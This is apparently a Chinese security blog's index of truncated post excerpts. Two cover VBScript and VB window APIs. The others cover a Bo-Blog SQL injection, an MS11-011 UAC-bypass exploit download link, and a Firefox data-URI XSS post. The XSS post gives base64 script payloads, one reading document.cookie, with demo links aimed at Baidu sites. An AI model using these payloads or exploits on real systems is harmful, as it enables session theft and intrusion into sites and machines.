WScript.Shell: 对象的run和exec使用详解

    vbScript 中 WScript.Shell 对象的 run 和 exec 函数功能使用详解 函数声明:     Set Ws = CreateObject("Wscript.Shell")     Function Exec(ByVal Command As String) As WshExec     Function Run(ByVal Command As String, [ByVal WindowStyle], [ByVal WaitOnReturn]) As Integer 函数区别:       1,返回值不同     Run 的返回值是一

【VB】SetWindowPos改变窗口位置,样式

    SetWindowPos 改变窗口位置、样式、尺寸函数功能详解 函数原型:     Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long     BOOL SetWindowPos(HWND hWnd,

Bo-Blog BloggerBo-blog博客程序注入漏洞

    Bo-Blog BloggerBo-blog 博客程序鸡肋注入漏洞     by:xhm1n9 2011.2.21 inc/mod_main.php //漏洞文件:  case 'category':    if (!$job) $job='default';  else $job=basename($job);  $ifannouncement="none";  acceptrequest('mode');  if ($mode==1 || $mode==2) {       //..........................  } elseif (!empty($mode) && (!is_numeric($mode) || $mode>2)) {      getHttp404($lnc[313]);  }    //...................... if (is_numeric($itemid)) $itemid=floor($itemid); //注意1         elseif (isset($categorynames[$itemid])) $item

MS11-011 - Windows 内核权限提升漏洞

    Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day,Bypassing UAC with User Privilege under Windows Vista/7 - Mirror。     补丁出来了价值就不大了。 Exp下载地址:     http://www.exploit-db.com/sploits/uacpoc.zip 漏洞分析:     http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/     http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4398

【漏洞】Firefox (火狐浏览器) data uri xss

    /**     * Title:Firefox data uri xss     * Author:sogili@0xsec     * Website:0xsec.org sogili.com     * Date:2011/02/13     */ Exp: <html> <!-- by sogili --> <body> <a href="data:text/html;base64,PHNjcmlwdD5vcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9J3h4b28nO2Nsb3NlKCk8L3NjcmlwdD4=" target="_blank">Fiefox click</a> <!--<a href="data:text/html,<script>opener.document.body.innerHTML='0xsec.org';close()</script>" target="_blank">Fiefox click</a>--> </body> <html> Demo: 百度空间XSS: <a target="_blank" href="data:text/html;base64,PHNjcmlwdD5jbG9zZSgpO3dpdGgob3BlbmVyKWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">Firefox user click</a> 百度贴吧XSS: <a target="_blank" href="data:text/html;base64,PHNjcmlwdD5jbG9zZSgpO3dpdGgob3BlbmVyKWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">Firefox user